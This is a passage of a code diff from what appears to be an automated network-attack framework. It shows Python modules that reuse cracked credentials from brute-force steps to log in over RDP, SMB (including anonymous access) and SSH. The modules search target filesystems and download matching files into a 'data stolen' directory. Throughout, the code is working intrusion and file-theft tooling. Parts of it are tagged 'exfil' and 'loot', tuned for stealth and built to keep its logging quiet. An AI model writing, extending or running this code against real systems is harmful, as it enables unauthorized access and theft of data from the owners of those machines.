except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,223 +1,252 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).
SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
import os
import logging
from rich.console import Console
from threading import Timer
import time
from threading import Timer
from typing import List, Tuple, Dict, Optional
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSMB initialized")
def connect_smb(self, ip, username, password):
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds (grouped by share) --------
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
"""
Establish an SMB connection.
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
Prefer IP; also include MAC if known. Dedup per share.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
out: Dict[str, List[Tuple[str, str]]] = {}
seen: Dict[str, set] = {}
for row in (by_ip + by_mac):
share = str(row.get("database") or "").strip()
user = str(row.get("user") or "").strip()
pwd = str(row.get("password") or "").strip()
if not user or not share:
continue
if share not in out:
out[share], seen[share] = [], set()
if (user, pwd) in seen[share]:
continue
seen[share].add((user, pwd))
out[share].append((user, pwd))
return out
# -------- SMB helpers --------
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
conn.connect(ip, b_port)
self.smb_connected = True
logger.info(f"Connected SMB {ip} as {username}")
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.error(f"SMB connect error {ip} {username}: {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
def list_shares(self, conn: SMBConnection):
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
except Exception as e:
logger.error(f"Error listing shares: {e}")
logger.error(f"list_shares error: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
files: List[str] = []
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
for entry in conn.listPath(share, dir_path):
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if entry.isDirectory:
if entry.filename not in ('.', '..'):
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
name = entry.filename
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, name))
return files
except Exception as e:
logger.error(f"SMB path error {share}:{dir_path}: {e}")
raise
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share, remote_file, f)
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"SMB download error {share}:{remote_file}: {e}")
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
creds_by_share = self._get_creds_by_share(ip, port_i)
logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
def _timeout():
if not self.smb_connected:
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first (''/'')
try:
conn = self.connect_smb(ip, '', '')
if conn:
shares = self.list_shares(conn)
for s in shares:
files = self.find_files(conn, s.name, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, s.name, remote, base)
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
success = True
try:
conn.close()
except Exception:
pass
except Exception as e:
logger.info(f"Anonymous SMB failed on {ip}: {e}")
if success:
timer.cancel()
return 'success'
# Per-share credentials
for share, creds in creds_by_share.items():
if share in self.IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
conn = self.connect_smb(ip, username, password)
if not conn:
continue
files = self.find_files(conn, share, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, share, remote, base)
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
success = True
try:
conn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,173 +1,356 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_ssh.py — SSH file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
import os
import paramiko
import logging
import time
from rich.console import Console
import logging
import paramiko
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
# Logger for this module
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
b_class = "StealFilesSSH" # Unique action identifier
b_module = "steal_files_ssh" # Python module name (this file without .py)
b_status = "steal_files_ssh" # Human/readable status key (free form)
b_action = "normal" # 'normal' (per-host) or 'global'
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
b_port = 22 # Preferred target port (used if present on host)
# Trigger strategy:
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
# - Also allow starting when the host exposes SSH (on_service:ssh),
# but the requirements below still enforce that SSH creds must be present.
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
# Requirements (JSON string):
# - must have SSH credentials on this MAC
# - must have port 22 (legacy fallback if port_services is missing)
# - limit concurrent running actions system-wide to 2 for safety
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 70 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def __init__(self, shared_data: SharedData):
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
self.shared_data = shared_data
self.sftp_connected = False # flipped to True on first SFTP open
self.stop_execution = False # global kill switch (timer / orchestrator exit)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSSH initialized")
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit :
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
# --------------------- Identity cache (hosts) ---------------------
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
"""Return MAC for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
"""Return current hostname for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Credentials (creds table) ---------------------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Fetch SSH creds for this target from DB.creds.
Strategy:
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
- Also include rows for same MAC (if known), still service='ssh'.
Returns list of (username, password), deduplicated.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
# Pull by IP
by_ip = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(ip,'') = :ip
AND (port IS NULL OR port = :port)
""",
params
)
# Pull by MAC (if we have one)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(mac_address,'') = :mac
AND (port IS NULL OR port = :port)
""",
params
)
# Deduplicate while preserving order
seen = set()
out: List[Tuple[str, str]] = []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# --------------------- SSH helpers ---------------------
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
"""
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
NOTE: Paramiko logs are silenced at module import level.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
ssh.connect(
hostname=ip,
username=username,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
allow_agent=False,
look_for_keys=False,
)
logger.info(f"Connected to {ip} via SSH as {username}")
return ssh
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
"""
List candidate files from remote dir, filtered by config:
- shared_data.steal_file_extensions (endswith)
- shared_data.steal_file_names (substring match)
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
"""
# Quiet 'permission denied' messages via redirection
cmd = f'find {dir_path} -type f 2>/dev/null'
stdin, stdout, stderr = ssh.exec_command(cmd)
files = (stdout.read().decode(errors="ignore") or "").splitlines()
exts = set(self.shared_data.steal_file_extensions or [])
names = set(self.shared_data.steal_file_names or [])
if not exts and not names:
# If no filters are defined, do nothing (too risky to pull everything).
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
return []
matches: List[str] = []
for fpath in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
fname = os.path.basename(fpath)
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
matches.append(fpath)
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
"""
sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected
try:
# Check file size before downloading
try:
st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
# --------------------- Orchestrator entrypoint ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Steal files from the remote server using SSH.
Orchestrator entrypoint (signature preserved):
- ip: target IP
- port: str (expected '22')
- row: current target row (compat structure built by shared_data)
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
# Gather credentials from DB
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
logger.error(f"No SSH credentials for {ip}. Skipping.")
return 'failed'
# Define a timer: if we never establish SFTP in 4 minutes, abort
def _timeout():
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
# Identify where to save loot
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
# Try each credential until success (or interrupted)
success_any = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
break
self.steal_file(ssh, remote, base_dir)
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
success_any = True
try:
ssh.close()
except Exception:
pass
if success_any:
break # one successful cred is enough
except Exception as e:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
return 'success' if success_any else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__":
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
sd = SharedData()
action = StealFilesSSH(sd)
# Example (replace with a real IP that has creds in DB):
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
# print("Result:", result)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,180 +1,218 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_telnet.py — Telnet file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
- Credentials read from DB.creds (service='telnet'); we try each pair.
- Files found via 'find / -type f', then retrieved with 'cat'.
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
